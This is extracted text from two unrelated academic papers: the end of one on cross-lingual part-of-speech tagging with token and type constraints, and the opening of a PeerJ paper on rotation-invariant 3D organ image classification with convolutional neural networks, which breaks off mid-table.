fr 88.4** 83.5 84.7 85.9 86.4 87.4 84.9 87.2 85.6 it 89.6 85.2 88.5 88.7 87.6 89.8 88.3 89.3 89.4 ja 72.8 47.6 54.2 43.2 76.1 70.5 44.9 81.0** 68.0 nl 83.1 78.4 82.4 82.3 84.2 83.2 83.1 85.9** 83.2 pt 89.1 84.7 87.0 86.6 88.7 88.0 87.9 91.0** 88.3 sl 82.4 69.8 78.2 78.5 81.8 80.1 79.7 82.3 80.0 sv 86.1 80.1 84.2 82.3 87.9 86.9 84.4 88.9** 85.5 tr 62.4 58.1 64.5 64.6 61.8 64.8 65.0 64.1** 65.2 zh 72.6 52.7 39.5 56.0 74.1 73.3 59.7 74.4** 73.4 avg (8) 87.2 82.0 84.2 84.5 87.0 86.8 84.9 88.8 85.4 avg 82.8 74.1 76.9 77.6 82.8 82.3 78.2 84.5 81.1 Table 2: Tagging accuracies for models with token constraints and coupled token and type constraints. All models use cluster features (. . . +C) and are trained on large training sets each containing 500k tokens with (partial) token-level projections (. . . +L). The best type-constrained model, trained on the larger datasets, YHMMunion +C+L, is included for comparison. The remaining columns correspond to HMM and CRF models trained only with token constraints (ỹ . . .) and with coupled token and type constraints (Ŷ . . .). The latter are trained using the projected dictionary (·proj.), Wiktionary (·wik.) and the union of these dictionaries (·union), respectively. The search spaces of the models trained with coupled constraints (Ŷ . . .) are each pruned with the respective tag dictionary used to derive the coupled constraints. The observed difference between ŶCRFwik. +C+L and YHMMunion +C+L is statistically significant at p < 0.01 (**) and p < 0.015 (*) according to a paired bootstrap test (Efron and Tibshirani, 1993). Significance was not assessed for avg or avg (8). We next add monolingual cluster features to the model with the union dictionary. This model, YHMMunion +C, significantly outperforms all other type- constrained models, demonstrating the utility of word-cluster features.9 For further exploration, we train the same model on the datasets containing 500K tokens sampled from the target side of the parallel data (YHMMunion +C+L); this is done to explore the effects of large data during training. We find that training on these datasets result in an average accuracy of 87.2% which is comparable to the 87.3% reported for YHMMunion +C in Table 1. This shows that the different source domain and amount of training data does not influence the performance of the HMM significantly. Finally, we train CRF models where we treat type constraints as a partially observed lattice and use the full unpruned lattice for computing the partition func- 9These are monolingual clusters. Bilingual clusters as intro- duced in Täckström et al. (2012) might bring additional benefits. tion (§3.2). Due to space considerations, the results of these experiments are not shown in table 1. We ob- serve similar trends in these results, but on average, accuracies are much lower compared to the type- constrained HMM models; the CRF model with the union dictionary along with cluster features achieves an average accuracy of 79.3% when trained on same data. This result is not unsurprising. First, the CRF’s search space is fully unconstrained. Second, the dic- tionary only provides a weak set of observation con- straints, which do not provide sufficient information to successfully train a discriminative model. How- ever, as we will observe next, coupling the dictionary constraints with token-level information solves this problem. 4.3 Models with Token and Type Constraints We now proceed to add token-level information, focusing in particular on coupled token and type 8 constraints. Since it is not possible to generate projected token constraints for our monolingual treebanks, we train all models in this subsection on the 500K-tokens datasets sampled from the bi- text. As a baseline, we first train HMM and CRF models that use only projected token constraints (ỹHMM+C+L and ỹCRF+C+L). As shown in Table 2, these models underperform the best type-level model (YHMMunion +C+L),10 which confirms that projected to- ken constraints are not reliable on their own. This is in line with similar projection models previously examined by Das and Petrov (2011). We then study models with coupled token and type constraints. These models use the same three dictio- naries as used in §4.2, but additionally couple the derived type constraints with projected token con- straints; see the caption of Table 2 for a list of these models. Note that since we only allow projected tags that are licensed by the dictionary (Step 3 of the trans- fer, §2.3), the actual token constraints used in these models vary with the different dictionaries. From Table 2, we see that coupled constraints are superior to token constraints, when used both with the HMM and the CRF. However, for the HMM, cou- pled constraints do not provide any benefit over type constraints alone, in particular when the projected dictionary or the union dictionary is used to derive the coupled constraints (ŶHMMproj. +C+L and ŶHMMunion +C+L). We hypothesize that this is because these dictionar- ies (in particular the former) have the same bias as the token-level tag projections, so that the dictionary is unable to correct the systematic errors in the pro- jections (see §2.1). Since the token constraints are stronger than the type constraints in the coupled mod- els, this bias may have a substantial impact. With the Wiktionary dictionary, the difference between the type-constrained and the coupled-constrained HMM is negligible: YHMMunion +C+L and ŶHMMwik. +C+L both av- erage at an accuracy of 82.8%. The CRF model, on the other hand, is able to take advantage of the complementary information in the coupled constraints, provided that the dictionary is able to filter out the systematic token-level errors. With a dictionary derived from Wiktionary and pro- jected token-level constraints, ŶCRFwik. +C+L performs 10To make the comparison fair vis-a-vis potential divergences in training domains, we compare to the best type-constrained model trained on the same 500K tokens training sets. 0 1 2 3 0 25 50 75 100 0 1 10 100 0 1 10 100 0 1 10 100 0 1 10 100 Number of token−level projections T a g g in g a c c u ra c y Number of tags listed in Wiktionary Figure 4: Relative influence of token and type constraints on tagging accuracy in the ŶCRFwik. +C+L model. Word types are categorized according to a) their number of Wiktionary tags (0,1,2 or 3+ tags, with 0 representing no Wiktionary entry; top-axis) and b) the number of times they are token- constrained in the training set (divided into buckets of 0, 1-9, 10-99 and 100+ occurrences; x-axis). The boxes summarize the accuracy distributions across languages for each word type category as defined by a) and b). The horizontal line in each box marks the median accuracy, the top and bottom mark the first and third quantile, re- spectively, while the whiskers mark the minimum and maximum values of the accuracy distribution. better than all the remaining models, with an average accuracy of 88.8% across the eight Indo-European languages available to D&P and LG&T. Averaged over all 15 languages, its accuracy is 84.5%. 5 Further Analysis In this section we provide a detailed analysis of the impact of token versus type constraints and we study the pruning and filtering mistakes resulting from in- complete Wiktionary entries in detail. This analysis is based on the training portion of each treebank. 5.1 Influence of Token and Type Constraints The empirical success of the model trained with cou- pled token and type constraints confirms that these constraints indeed provide complementary signals. Figure 4 provides a more detailed view of the rela- tive benefits of each type of constraint. We observe several interesting trends. First, word types that occur with more token con- straints during training are generally tagged more accurately, regardless of whether these types occur 9 90.0 92.5 95.0 97.5 100.0 0 50 100 150 200 250 Number of corrected Wiktionary entries P ru n in g a cc u ra cy Figure 5: Average pruning accuracy (line) across lan- guages (dots) as a function of the number of hypotheti- cally corrected Wiktionary entries for the k most frequent word types. For example, position 100 on the x-axis cor- responds to manually correcting the entries for the 100 most frequent types, while position 0 corresponds to ex- perimental conditions. in Wiktionary. The most common scenario is for a word type to have exactly one tag in Wiktionary and to occur with this projected tag over 100 times in the training set (facet 1, rightmost box). These com- mon word types are typically tagged very accurately across all languages. Second, the word types that are ambiguous accord- ing to Wiktionary (facets 2 and 3) are predominantly frequent ones. The accuracy is typically lower for these words compared to the unambiguous words. However, as the number of projected token con- straints is increased from zero to 100+ observations, the ambiguous words are effectively disambiguated by the token constraints. This shows the advantage of intersecting token and type constraints. Finally, projection generally helps for words that are not in Wiktionary, although the accuracy for these words never reach the accuracy of the words with only one tag in Wiktionary. Interestingly, words that occur with a projected tag constraint less than 100 times are tagged more accurately for types not in the dictionary compared to ambiguous word types with the same number of projected constraints. A possible explanation for this is that the ambiguous words are inherently more difficult to predict and that most of the words that are not in Wiktionary are less common words that tend to also be less ambiguous. zh tr sv sl pt nl ja it fr es el de da cs bg avg 0 25 50 75 100 Proportion of pruning errors PRON NOUN DET ADP PRT ADV NUM CONJ ADJ VERB X . Figure 6: Prevalence of pruning mistakes per POS tag, when pruning the inference search space with Wiktionary. 5.2 Wiktionary Pruning Mistakes The error analysis by Li et al. (2012) showed that the tags licensed by Wiktionary are often valid. When using Wiktionary to prune the search space of our constrained models and to filter token-level projec- tions, it is also important that correct tags are not mistakenly pruned because they are missing from Wiktionary. While the accuracy of filtering is more difficult to study, due to the lack of a gold standard tagging of the bitext, Figure 5 (position 0 on the x- axis) shows that search space pruning errors are not a major issue for most languages; on average the pruning accuracy is almost 95%. However, for some languages such as Chinese and Czech the correct tag is pruned from the search space for nearly 10% of all tokens. When using Wiktionary as a pruner, the upper bound on accuracy for these languages is therefore only around 90%. However, Figure 5 also shows that with some manual effort we might be able to remedy many of these errors. For example, by adding miss- ing valid tags to the 250 most common word types in the worst language, the minimum pruning accuracy would rise above 95% from below 90%. If the same was to be done for all of the studied languages, the mean pruning accuracy would reach over 97%. Figure 6 breaks down pruning errors resulting from incorrect or incomplete Wiktionary entries across the correct POS tags. From this we observe that, for many languages, the pruning errors are highly skewed towards specific tags. For example, for Czech over 80% of the pruning errors are caused by mistak- enly pruned pronouns. 10 6 Conclusions We considered the problem of constructing multilin- gual POS taggers for resource-poor languages. To this end, we explored a number of different models that combine token constraints with type constraints from different sources. The best results were ob- tained with a partially observed CRF model that ef- fectively integrates these complementary constraints. In an extensive empirical study, we showed that this approach substantially improves on the state of the art in this context. Our best model significantly out- performed the second-best model on 10 out of 15 evaluated languages, when trained on identical data sets, with an insignificant difference on 3 languages. Compared to the prior state of the art (Li et al., 2012), we observed a relative reduction in error by 25%, averaged over the eight languages common to our studies. Acknowledgments We thank Alexander Rush for help with the hyper- graph framework that was used to implement our models and Klaus Macherey for help with the bi- text extraction. This work benefited from many dis- cussions with Yoav Goldberg, Keith Hall, Kuzman Ganchev and Hao Zhang. We also thank the editor and the three anonymous reviewers for their valuable feedback. The first author is grateful for the financial support from the Swedish National Graduate School of Language Technology (GSLT). References Anne Abeillé, Lionel Clément, and François Toussenel. 2003. Building a Treebank for French. In A. Abeillé, editor, Treebanks: Building and Using Parsed Corpora, chapter 10. Kluwer. Taylor Berg-Kirkpatrick, Alexandre Bouchard-Côté, John DeNero, and Dan Klein. 2010. Painless unsupervised learning with features. In Proceedings of NAACL-HLT. Sabine Buchholz and Erwin Marsi. 2006. CoNLL-X shared task on multilingual dependency parsing. In Proceedings of CoNLL. Stanley F Chen. 2003. Conditional and joint models for grapheme-to-phoneme conversion. In Proceedings of Eurospeech. Christos Christodoulopoulos, Sharon Goldwater, and Mark Steedman. 2010. Two decades of unsupervised POS induction: How far have we come? In Proceed- ings of EMNLP. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proceedings of ACL-HLT. Arthur P. Dempster, Nan M. Laird, and Donald B. Rubin. 1977. Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society, Series B, 39. John DeNero and Klaus Macherey. 2011. Model-based aligner combination using dual decomposition. In Pro- ceedings of ACL-HLT. Brad Efron and Robert J. Tibshirani. 1993. An Introduc- tion to the Bootstrap. Chapman & Hall, New York, NY, USA. Victoria Fossum and Steven Abney. 2005. Automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. In Proceedings of IJCNLP. Dan Garrette and Jason Baldridge. 2012. Type-supervised hidden markov models for part-of-speech tagging with incomplete tag dictionaries. In Proceedings of EMNLP- CoNLL. Yoav Goldberg, Meni Adler, and Michael Elhadad. 2008. EM can find pretty good HMM POS-taggers (when given a good start). In Proceedings of ACL-HLT. Philipp Koehn. 2005. Europarl: A parallel corpus for statistical machine translation. In MT Summit. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: Probabilistic models for segmenting and labeling sequence data. In Proceedings of ICML. Shen Li, João Graça, and Ben Taskar. 2012. Wiki-ly supervised part-of-speech tagging. In Proceedings of EMNLP-CoNLL. Dong C. Liu and Jorge Nocedal. 1989. On the limited memory BFGS method for large scale optimization. Mathematical Programming, 45. Mitchell P. Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated corpus of English: the Penn treebank. Computational Linguis- tics, 19(2). Tahira Naseem, Benjamin Snyder, Jacob Eisenstein, and Regina Barzilay. 2009. Multilingual part-of-speech tagging: Two unsupervised approaches. JAIR, 36. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of EMNLP-CoNLL. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A universal part-of-speech tagset. In Proceedings of LREC. Sujith Ravi and Kevin Knight. 2009. Minimized models for unsupervised part-of-speech tagging. In Proceed- ings of ACL-IJCNLP. 11 Stefan Riezler, Tracy H. King, Ronald M. Kaplan, Richard Crouch, John T. Maxwell, III, and Mark Johnson. 2002. Parsing the wall street journal using a lexical-functional grammar and discriminative estimation techniques. In Proceedings of ACL. Noah Smith and Jason Eisner. 2005. Contrastive estima- tion: Training log-linear models on unlabeled data. In Proceedings of ACL. Oscar Täckström, Ryan McDonald, and Jakob Uszkoreit. 2012. Cross-lingual word clusters for direct transfer of linguistic structure. In Proceedings of NAACL-HLT. Joseph Turian, Lev-Arie Ratinov, and Yoshua Bengio. 2010. Word representations: A simple and general method for semi-supervised learning. In Proceedings of ACL. UN. 2006. ODS UN parallel corpus. Jakob Uszkoreit and Thorsten Brants. 2008. Distributed word clustering for large scale class-based language modeling in machine translation. In Proceedings of ACL-HLT. Jakob Uszkoreit, Jay Ponte, Ashok Popat, and Moshe Dubiner. 2010. Large scale parallel document mining for machine translation. In Proceedings of COLING. Chenhai Xi and Rebecca Hwa. 2005. A backoff model for bootstrapping resources for non-English languages. In Proceedings of HLT-EMNLP. David Yarowsky and Grace Ngai. 2001. Inducing mul- tilingual POS taggers and NP bracketers via robust projection across aligned corpora. In Proceedings of NAACL. 12 work_wiqq6vr24vbcjdnf4n4fbfulby ---- Submitted 27 November 2018 Accepted 10 February 2019 Published 4 March 2019 Corresponding author Kh Tohidul Islam, kh.tohidulislam@gmail.com Academic editor Gang Mei Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.181 Copyright 2019 Islam et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A rotation and translation invariant method for 3D organ image classification using deep convolutional neural networks Kh Tohidul Islam, Sudanthi Wijewickrema and Stephen O’Leary Department of Surgery (Otolaryngology), University of Melbourne, Melbourne, Victoria, Australia ABSTRACT Three-dimensional (3D) medical image classification is useful in applications such as disease diagnosis and content-based medical image retrieval. It is a challenging task due to several reasons. First, image intensity values are vastly different depending on the image modality. Second, intensity values within the same image modality may vary depending on the imaging machine and artifacts may also be introduced in the imaging process. Third, processing 3D data requires high computational power. In recent years, significant research has been conducted in the field of 3D medical image classification. However, most of these make assumptions about patient orientation and imaging direction to simplify the problem and/or work with the full 3D images. As such, they perform poorly when these assumptions are not met. In this paper, we propose a method of classification for 3D organ images that is rotation and translation invariant. To this end, we extract a representative two-dimensional (2D) slice along the plane of best symmetry from the 3D image. We then use this slice to represent the 3D image and use a 20-layer deep convolutional neural network (DCNN) to perform the classification task. We show experimentally, using multi-modal data, that our method is comparable to existing methods when the assumptions of patient orientation and viewing direction are met. Notably, it shows similarly high accuracy even when these assumptions are violated, where other methods fail. We also explore how this method can be used with other DCNN models as well as conventional classification approaches. Subjects Artificial Intelligence, Computer Vision, Data Mining and Machine Learning Keywords Deep Learning, Medical Image Processing, Image Classification, Symmetry, 3D Organ Image Classification INTRODUCTION With the rapid growth of medical imaging technologies, a large volume of 3D medical images of different modalities such as magnetic resonance imaging (MRI), computed tomography (CT), and positron emission tomography (PET) has become available (Research & Markets, 2018). This has resulted in the formation of large medical image databases that offer opportunities for evidence-based diagnosis, teaching, and research. Within this context, the need for the development of 3D image classification methods has risen. For example, 3D medical image classification is used in applications How to cite this article Islam KT, Wijewickrema S, O’Leary S. 2019. A rotation and translation invariant method for 3D organ image classification using deep convolutional neural networks. PeerJ Comput. Sci. 5:e181 http://doi.org/10.7717/peerj-cs.181 https://peerj.com mailto:kh.tohidulislam@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.181 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.181 such as computer aided diagnosis (CAD) and content-based medical image retrieval (CBMIR) (Zhou et al., 2006; Kumar et al., 2013). In recent years, many algorithms have been introduced for the classification of 3D medical images (Arias et al., 2016; Mohan & Subashini, 2018). Both conventional classification methods and deep learning have been used for this purpose. For example, Öziç & Özşen (2017) proposed a voxel-based morphometry method to transform 3D voxel values into a vector to be used as features in a support vector machine (SVM) in order to identify patients with Alzheimer’s disease using MR images. Bicacro, Silveira & Marques (2012) investigated the classification of 3D brain PET images into three classes: Alzheimer’s disease, mild cognitive impairment, and cognitively normal. To this end, they used three different feature extraction approaches (volumetric intensity, 3D Haar-like (Cui et al., 2007), and histogram of oriented gradients (HoG) (Dalal & Triggs, 2005)) and trained a SVM using these features. Morgado, Silveira & Marques (2013) also performed a similar classification (Alzheimer’s disease, mild cognitive impairment, and cognitively normal) for PET brain images. They used 2D and 3D local binary patterns as texture descriptors to extract features and performed the classification task using a SVM. A 3D image classification method was proposed by Liu & Dellaert (1998) for the pathological classification of brain CT images (captured by the same scanner) as normal, (evidence of) blood, or stroke. First, in a pre-processing step, they manually realigned all images so that the mid-sagittal plane was at the middle of the image. Then, considering the symmetry of the image, they extracted 50 image features from half of each 2D slice (in the superior-inferior direction) and used kernel regression for classification. A limitation of conventional classification methods such as these, is that the most appropriate features for a given problem have to be extracted first, in order to train the classifiers. In contrast, deep learning techniques such as deep convolutional neural networks (DCNNs) extract the features as part of the learning process, thereby ensuring that the optimal features for a given task are extracted. A 3D DCNN was used by Ahn (2017) to classify lung cancer (cancer positive or negative) from CT images. The author modified the SqueezeNet (Iandola et al., 2016) architecture (which is traditionally suitable for 2D images) to obtain SqueezeNet3D which is appropriate for 3D image classification. Liu & Kang (2017) introduced a lung nodule classification approach by using a multi- view DCNN for CT images. They obtained a 3D volume by considering multiple views of a given nodule (patches of different sizes around the nodule) prior to classification. They performed two classifications: binary (benign or malignant) and ternary (benign, primary malignant, or metastatic malignant). Jin et al. (2017) modified the AlexNet (Krizhevsky, Sutskever & Hinton, 2012) architecture to make it suitable for the classification of 3D CT images of lungs. They segmented the lungs from the CT image using a pre-processing step and performed a binary classification (cancer or not) on the resulting image. Instead of using 3D DCNNs, other researchers have considered how 2D DCNNs can be used to classify 3D medical images. For example, Qayyum et al. (2017) used each and every 2D slice of a 3D image Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 as input to a 2D DCNN. They classified the images into 24 classes and used a publicly available 3D medical image database to evaluate their methodology. Usually 3D medical images are captured/reconstructed so that they are consistent with respect to viewing direction and patient orientation (rotation and translation). For example, image slices are typically taken in the superior-inferior direction. An effort is made to ensure that the patient is aligned in such a way that the mid-sagittal and mid-coronal planes are aligned at the middle of the image. Thus, most classification methods assume that these requirements are met (e.g., Qayyum et al., 2017). As such, they may not perform well if these assumptions are violated. Others perform manual pre-processing prior to the classification to avoid this issue (e.g., Liu & Dellaert, 1998). In this paper, we consider the specific case of 3D organ image classification and propose an algorithm that is robust against rotation and translation. To this end, we exploit the fact that the human body is roughly symmetric, and extract a 2D slice from the plane of best symmetry from a 3D image of the organ in a pre-processing step. We consider this slice to be representative of the 3D image, as it provides a relatively consistent cross-section of the 3D image, irrespective of its orientation. Then, we use this ‘representative’ 2D image to train a 2D DCNN to classify the 3D image. As discussed later, simplicity is one of the major features of the algorithm we propose. We show through experiments performed on publicly available muliti-modal (CT and MRI) data that (1) the proposed method is as accurate as other similar methods when the above assumptions are met, (2) it significantly outperforms other methods when faced with rotated and/or translated data, (3) the training time of the proposed method is low, and (4) it achieves similarly high results when used with other DCNN architectures. MATERIALS AND METHODS In this section, we discuss the steps of the algorithm we propose for rotation and translation invariant 3D organ image classification: volume reconstruction, segmentation, symmetry plane extraction, and classification using a DCNN. Volume reconstruction First, we loaded the 2D slices of a DICOM image into a 3D array considering the InstanceNumber in the metadata to be the z dimension. As the slice thickness (z spacing) is not necessarily the same as the pixel spacing, this volume does not represent the real-world shape of the imaged organ/body part. To retain the actual shape, we resampled the 3D image using cubic interpolation (Miklos, 2004). The new array size for the resampled image was calculated using Eq. (1) where [nx,ny,nz] is the original array size, psx and psy are the x and y spacings respectively (PixelSpacing in metadata), and st is the z spacing (SliceThickness in metadata). An example of a volume reconstruction is shown in Fig. 1. [nx,ny,nz]= [ nx, ny∗psy psx , nz ∗st psx ] (1) Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 Figure 1 Volume reconstruction from DICOM images: (A) stack of 2D slices, (B) reconstructed 3D volume, and (C) resampled 3D volume. Full-size DOI: 10.7717/peerjcs.181/fig-1 Figure 2 Multi-level volume thresholding: (A) resampled volume from the previous step, (B) seg- mented volume, and (C) resulting point cloud. Full-size DOI: 10.7717/peerjcs.181/fig-2 3D volume segmentation To segment the organ(s) from the background, we used a multi-level global thresholding using Otsu’s method (Otsu, 1979). We used two thresholds and considered the voxels with intensity values within these thresholds to be the organ(s). This provides a segmentation (point cloud) of the organ(s) and also avoids the inclusion of possible imaging artifacts at the extremes of the intensity spectrum. An example of the segmentation process is shown in Fig. 2. Note that this is a simple segmentation process, and as such, does not provide an exact segmentation. However, from our results, we observed that this was sufficient for our purpose: simplifying the symmetry plane calculation in the next step of our algorithm. Representative 2D image extraction We calculated the plane of best symmetry from the point cloud resulting from the previous step using the method discussed in Cicconet, Hildebrand & Elliott (2017). They calculated Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 4/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-1 https://doi.org/10.7717/peerjcs.181/fig-2 http://dx.doi.org/10.7717/peerj-cs.181 Figure 3 Representative 2D image extraction: (A) segmented volume, (B) segmented point cloud with the plane of best symmetry shown as a circular plane, and (C) 2D image extracted from the symmetry plane. Full-size DOI: 10.7717/peerjcs.181/fig-3 the reflection of a point cloud around an arbitrary plane, used the iterative closest point algorithm (Besl & McKay, 1992) to register the original and reflected point clouds, and solved an eigenvalue problem related to the global transformation that was applied to the original data during registration. The first eigenvector in this solution is the normal to the plane of best symmetry. We extracted the 2D image resulting from the intersection of this plane with the 3D volume using the nearest neighbour method (Miklos, 2004). We considered the second and third eigenvectors to be the x and y axes for this 2D image respectively. We determined the bounds of the 2D image to be the minimum and maximum values resulting from the projections of the 3D volume vertices on the axes and the origin to be the middle of these minimum and maximum values. Figure 3 shows the extraction of the plane of best symmetry. Although the accuracy of the symmetry plane calculation depends on the segmentation step, and this can be avoided by using algorithms that minimize the distance between intensity values of voxels (Tuzikov, Colliot & Bloch, 2003; Teverovskiy & Li, 2006) instead, using the segmented point cloud is more efficient. As we found it is sufficient for our purposes, we used this method of symmetry plane calculation for the sake of efficiency. Classification using a DCNN Due to the roughly symmetric nature of the human body, the 2D images resulting from the previous step provide relatively consistent cross-sections of the 3D images. As such, we used these 2D images to train a standard 2D DCNN for the classification task. The DCNN used here consisted of 20 layers: one image input layer, four convolution layers, four batch normalization layers, four rectified linear unit (ReLU) (Nair & Hinton, 2010) layers, four max poling layers, one fully connected layer, one softmax layer, and one classification output layer. We resized the images to the size of 224×224 and normalized the intensity values to be in the range of [0 255]. Figure 4 illustrates the DCNN architecture. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 5/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-3 http://dx.doi.org/10.7717/peerj-cs.181 Figure 4 Deep convolutional neural network architecture. Full-size DOI: 10.7717/peerjcs.181/fig-4 RESULTS In this section, we discuss the performance metrics and databases used in the experiments, the implementation/extension of existing methods, and the experimental results. All experiments were performed in MATLAB R© (MathWorks Inc., 1998) on a HP Z6 G4 Workstation running Windows R© 10 Education on an Intel R© Xeon R© Silver 4108 CPU with a clock speed of 1.80 GHz, 16 GB RAM, and a NVIDIA R© Quadro R© P2000 GPU. Performance evaluation metrics To evaluate classification performance, we used commonly utilized metrics (accuracy and mean value of sensitivity, specificity, precision, f-measure, and g-mean) (Japkowicz, 2006; Powers, 2011; Olson & Delen, 2008). These metrics are defined in Eqs. (2)–(7) with respect to values of the confusion matrix: true positives (TP), true negatives (TN), false positives (FP), and false negatives (FN). Accuracy = TP+TN TP+FN +FP+TN (2) Sensitivity = TP TP+FN (3) Specificity = TN TN +FP (4) Precision = TP TP+FP (5) F−Measure =2× ( TP TP+FP × TP TP+FN TP TP+FP + TP TP+FN ) (6) G−Mean = √ TP TP+FN × TN TN +FP (7) Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 6/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-4 http://dx.doi.org/10.7717/peerj-cs.181 Figure 5 Database formation. Full-size DOI: 10.7717/peerjcs.181/fig-5 Databases We collected data from a publicly available 3D medical image database for our experiments: the cancer imaging archive (TCIA) (Clark et al., 2013). TCIA stores a large number of multi-modal medical images stored in the digital imaging and communications in medicine (DICOM) file format. From this database, we collected data (CT and MRI) for four classes that define different areas of the human body: head, thorax, breast, and abdomen. Some images, such as those that had a very low number of 2D DICOM slices and those with inconsistent imaging directions, were removed from our database. A total of 2400 3D images were obtained (600 images per class). Seventy percent of the images were used for training and the remaining thirty percent were used for testing. In addition to the original testing database, we created two other databases by (1) randomly rotating and translating and (2) randomly swapping the axes of the original test data. The former database was used to test for rotation and translation (patient orientation) invariance and the latter was used to test for robustness against changes in the imaging direction. In addition to this, we created an augmented training database by randomly rotating and translating 50% of the original training data, and randomly swapping axes of the remaining 50%. Figure 5 illustrates this process. To generate the transformed data that simulated changes in patient orientation (in the transformed test database and the augmented training database), we performed a random rotation in the range of [−150 150] with respect to the three coordinate axes and a random translation of [−5 5] along the coordinate axes on each image. Figure 6 shows an example of such a 3D transformation. To obtain the axis swapped data that simulated changes in imaging direction (in the axis swapped test database and the augmented training database), we randomly changed the axes of the original data. Note that this is synonymous to rotations of 900 around the x, y, or z axis. An example of a random axis swapping is shown in Fig. 7. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 7/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-5 http://dx.doi.org/10.7717/peerj-cs.181 Figure 6 An example of a random 3D transformation: (A) original volume, (B) transformed volume (a rotation of +15 0 counterclockwise around the z axis and a translation of [3, 2, 2] in the x, y, and z di- rection respectively), and (C) mid-axial slices of both original and transformed volumes. Full-size DOI: 10.7717/peerjcs.181/fig-6 Figure 7 An example of a random 3D axis swapping: (A) original volume, (B) axis swapped volume with the x axis changed to the y axis and z axis changed to the x axis, and (C) mid-axial slices of both original and axis swapped volumes. Full-size DOI: 10.7717/peerjcs.181/fig-7 Performance comparison with other similar methods We evaluated our method against similar existing methods. We reimplemented the method of Qayyum et al. (2017) that used all 2D slices to represent the 3D volume. We implemented their DCNN in MATLAB and used all slices of the training and testing sets respectively to train and evaluate this method. As the authors used images of size 224×224 as their input, we also performed the same resizing of the data in a pre-processing step. We also implemented the method used in the classification of 3D lung images introduced in Jin et al. (2017). They used thresholds based on the Hounsfield unit (HU) to extract an initial mask from CT images and used morphological operations to fill holes in this mask. Then, they segmented the lungs using this mask and trained a DCNN for the classification task. However, this method cannot be directly used in our problem. First, we have multi-modal data, and hence, it is not possible to use the HU scale, which is specific to CT images. Second, we have images of different organs which would require the definition of organ specific thresholds. Third, morphological operations require the input of the size of dilation/erosion which varies depending on the type of image. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 8/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-6 https://doi.org/10.7717/peerjcs.181/fig-7 http://dx.doi.org/10.7717/peerj-cs.181 Table 1 Performance comparison with similar existing methods (without data augmentation). Best performance per metric per database is highlighted in bold. Database Methodology Accuracy Sensitivity Specificity Precision F-Measure G-Mean Jin et al. (2017) 0.9514 0.9514 0.9838 0.9525 0.9515 0.9675 Qayyum et al. (2017) 0.9014 0.9014 0.9671 0.9168 0.9029 0.9337 Prasoon et al. (2013) 0.9653 0.9653 0.9884 0.9679 0.9654 0.9768 Ahn (2017) 0.9972 0.9972 0.9991 0.9973 0.9972 0.9981 Original Proposed 0.9944 0.9944 0.9981 0.9945 0.9944 0.9963 Jin et al. (2017) 0.8611 0.8611 0.9537 0.9080 0.8642 0.9062 Qayyum et al. (2017) 0.6694 0.6694 0.8898 0.7670 0.5921 0.7718 Prasoon et al. (2013) 0.9306 0.9306 0.9769 0.9364 0.9306 0.9534 Ahn (2017) 0.9333 0.9333 0.9778 0.9378 0.9325 0.9553 Transformed Proposed 0.9917 0.9917 0.9972 0.9919 0.9916 0.9944 Jin et al. (2017) 0.6222 0.6222 0.8741 0.7549 0.6065 0.7375 Qayyum et al. (2017) 0.5056 0.5056 0.8352 0.7630 0.4491 0.6498 Prasoon et al. (2013) 0.8028 0.8028 0.9343 0.8420 0.7936 0.8660 Ahn (2017) 0.7264 0.7264 0.9088 0.7707 0.7122 0.8125 Axis Swapped Proposed 0.9875 0.9875 0.9958 0.9876 0.9875 0.9917 Therefore, we used a process that can be generally applied to all images in our database. First, we created a binary mask using the multi-level global thresholding method discussed earlier. Then, we used active contours introduced in Chan & Vese (2001) on the initial mask with 100 iterations to fill in holes and obtain a more refined mask. Finally, we extracted the organ from the background using this mask and used this as the input to the DCNN. Jin et al. (2017) observed that an input image size of 128×128×20 provided the best performance, and therefore, we also resized the input images to this size. Another 3D medical image classification model we implemented was Ahn (2017) which was used for lung image classification. The author performed an intensity normalization of their CT images based on the HU scale in a pre-processing step. Due to the same reasons as above, we did not perform this normalization. We used the same resizing of the data they used (128×128×128) in our implementation. As an additional method of comparison, we extended the idea presented in Prasoon et al. (2013) for image segmentation, to make it applicable to our problem. They explored the classification of each voxel in 3D MRI images for the purpose of knee cartilage segmentation. They extracted three 2D patches around a voxel in the x, y, and z directions, trained DCNNs for each 2D patch, and combined the results of the three DCNNs in the final layer. We applied this idea to our problem by extracting the mid slices in the three coordinate directions and training three DCNNs similar to theirs. Performance comparisons with respect to the metrics discussed above when trained on the original and augmented training datasets are shown in Tables 1 and 2 respectively. Performance with regards to training time is given in Table 3. Figure 8 shows the Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 Table 